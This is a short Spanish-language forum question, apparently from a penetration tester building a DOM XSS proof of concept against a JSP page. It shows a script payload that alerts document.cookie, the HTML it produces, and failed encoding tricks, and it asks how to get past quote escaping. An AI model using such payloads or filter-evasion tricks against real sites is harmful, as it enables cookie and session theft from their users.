Estoy intentando generar un POC para el exploit DOM XSS. Podría inyectar un código usando el siguiente enlace:
<a href="wepage.jsp" target='"><script> alert(document.cookie)</script></div>'>domxss</a>
El código inyectado aparece en un elemento div en el parámetro data-window :
<div id="23212" class="contextMenu" data-window=""><script> alert(document.cookie)</script></div>" style="display: none;"><a .....
Intenté pasar "e como un código hexadecimal, doble codificación ( %2522 ), con hackbar String.fromCharCode... , pero aún así, la comilla doble se devuelve a "e;
¿Alguna sugerencia de cómo omitir la comilla doble o si hay otra forma de inyectar alerta aquí?